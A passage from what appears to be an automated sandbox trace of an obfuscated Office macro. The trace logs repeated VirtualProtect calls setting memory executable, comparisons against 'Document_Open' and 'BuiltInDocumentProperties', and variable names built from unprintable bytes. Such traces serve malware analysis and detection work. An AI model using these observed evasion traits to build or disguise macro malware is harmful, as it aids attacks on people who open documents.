dwSize=0x14) returned 1 [0101.057] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.057] GetCurrentProcess () returned 0xffffffff [0101.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0101.057] GetCurrentProcess () returned 0xffffffff [0101.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0101.057] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.058] GetCurrentProcess () returned 0xffffffff [0101.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0101.058] GetCurrentProcess () returned 0xffffffff [0101.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0101.058] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.058] GetCurrentProcess () returned 0xffffffff [0101.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0101.058] GetCurrentProcess () returned 0xffffffff [0101.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0101.058] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.059] GetCurrentProcess () returned 0xffffffff [0101.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0101.059] GetCurrentProcess () returned 0xffffffff [0101.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0101.059] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.060] GetCurrentProcess () returned 0xffffffff [0101.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0101.060] GetCurrentProcess () returned 0xffffffff [0101.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0101.060] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.060] GetCurrentProcess () returned 0xffffffff [0101.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0101.060] GetCurrentProcess () returned 0xffffffff [0101.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0101.060] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.061] GetCurrentProcess () returned 0xffffffff [0101.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0101.061] GetCurrentProcess () returned 0xffffffff [0101.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0101.061] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.061] GetCurrentProcess () returned 0xffffffff [0101.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0101.061] GetCurrentProcess () returned 0xffffffff [0101.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0101.061] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.062] GetCurrentProcess () returned 0xffffffff [0101.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0101.062] GetCurrentProcess () returned 0xffffffff [0101.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0101.062] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.062] GetCurrentProcess () returned 0xffffffff [0101.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0101.063] GetCurrentProcess () returned 0xffffffff [0101.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0101.063] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.063] GetCurrentProcess () returned 0xffffffff [0101.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0101.063] GetCurrentProcess () returned 0xffffffff [0101.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0101.063] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.064] GetCurrentProcess () returned 0xffffffff [0101.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0101.064] GetCurrentProcess () returned 0xffffffff [0101.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0101.064] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.065] GetCurrentProcess () returned 0xffffffff [0101.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0101.065] GetCurrentProcess () returned 0xffffffff [0101.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0101.065] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.065] GetCurrentProcess () returned 0xffffffff [0101.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0101.066] GetCurrentProcess () returned 0xffffffff [0101.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0101.066] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0101.066] GetCurrentProcess () returned 0xffffffff [0101.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0101.067] GetAsyncKeyState (vKey=3) returned 0 [0101.067] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0101.067] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0101.113] GetAsyncKeyState (vKey=3) returned 0 [0101.115] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197c5c | out: ppsaOut=0x197c5c) returned 0x0 [0101.115] SafeArrayAllocData (psa=0xc6f8e38) returned 0x0 [0101.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.117] CRetailMalloc_Alloc () returned 0xc6d85f0 [0101.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc6d85f0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x96\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.117] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="Document_Open", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="lOePrNSeOnF7", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0101.118] CRetailMalloc_Free () returned 0x1 [0101.118] longjmp () [0101.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.118] CRetailMalloc_Alloc () returned 0xc6d8780 [0101.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc6d8780, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0101.118] CRetailMalloc_Free () returned 0x1 [0101.118] longjmp () [0101.822] SafeArrayDestroyData (psa=0xc6f8e38) returned 0x0 [0101.822] SafeArrayDestroyDescriptor (psa=0xc6f8e38) returned 0x0 [0101.822] GetAsyncKeyState (vKey=3) returned 0 [0101.985] CRetailMalloc_Alloc () returned 0xc986860 [0101.985] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0101.985] memcpy (in: _Dst=0xcb65290, _Src=0x1978c4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0101.999] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0101.999] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.000] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97", cchCount2=-1) returned 1 [0102.000] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97", cchCount2=-1) returned 1 [0102.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432e0e, cbMultiByte=31, lpWideCharStr=0x1976c4, cchWideChar=32 | out: lpWideCharStr="————–—–––——––——––—––————–———–—") returned 31 [0102.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b055a, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="————–—–––——––——––—––————–———–—") returned 31 [0102.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b055a, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="————–—–––——––——––—––————–———–—") returned 31 [0102.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b055a, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="————–—–––——––——––—––————–———–—") returned 31 [0102.001] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97", cchCount2=-1) returned 1 [0102.001] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97", cchCount2=-1) returned 1 [0102.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b055a, cbMultiByte=31, lpWideCharStr=0x197724, cchWideChar=32 | out: lpWideCharStr="————–—–––——––——––—––————–———–—") returned 31 [0102.044] CRetailMalloc_Alloc () returned 0xb3bf2e8 [0102.044] _mbscpy_s (in: _Dst=0xb3bf2e8, _DstSizeInBytes=0x1f, _Src=0x112b055a | out: _Dst=0xb3bf2e8) returned 0x0 [0102.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0b62, cbMultiByte=38, lpWideCharStr=0x197734, cchWideChar=39 | out: lpWideCharStr="_B_var_————–—–––——––——––—––————–———–—") returned 38 [0102.044] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1f, _Src=0x112b055a | out: _Dst=0x19779c) returned 0x0 [0102.045] CRetailMalloc_Free () returned 0x1 [0102.045] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.045] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.045] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.045] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.045] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.045] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.045] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.045] memcpy (in: _Dst=0xc9868d8, _Src=0x197944, _Size=0x18 | out: _Dst=0xc9868d8) returned 0xc9868d8 [0102.045] CRetailMalloc_Realloc () returned 0xc986860 [0102.045] CRetailMalloc_Free () returned 0x1 [0102.046] GetCurrentProcess () returned 0xffffffff [0102.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.046] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.047] GetCurrentProcess () returned 0xffffffff [0102.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.047] GetCurrentProcess () returned 0xffffffff [0102.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.047] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.047] GetCurrentProcess () returned 0xffffffff [0102.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.047] GetCurrentProcess () returned 0xffffffff [0102.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.047] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.065] GetCurrentProcess () returned 0xffffffff [0102.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.065] GetCurrentProcess () returned 0xffffffff [0102.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.065] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.066] GetCurrentProcess () returned 0xffffffff [0102.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.066] GetCurrentProcess () returned 0xffffffff [0102.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.066] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.067] GetCurrentProcess () returned 0xffffffff [0102.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.067] GetCurrentProcess () returned 0xffffffff [0102.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.067] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.068] GetCurrentProcess () returned 0xffffffff [0102.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.068] GetCurrentProcess () returned 0xffffffff [0102.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.068] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.068] GetCurrentProcess () returned 0xffffffff [0102.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.068] GetCurrentProcess () returned 0xffffffff [0102.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.068] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.069] GetCurrentProcess () returned 0xffffffff [0102.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.069] GetCurrentProcess () returned 0xffffffff [0102.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.069] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.070] GetCurrentProcess () returned 0xffffffff [0102.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.070] GetCurrentProcess () returned 0xffffffff [0102.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.070] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0102.070] GetCurrentProcess () returned 0xffffffff [0102.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.070] GetCurrentProcess () returned 0xffffffff [0102.070] FlushInstructionCache 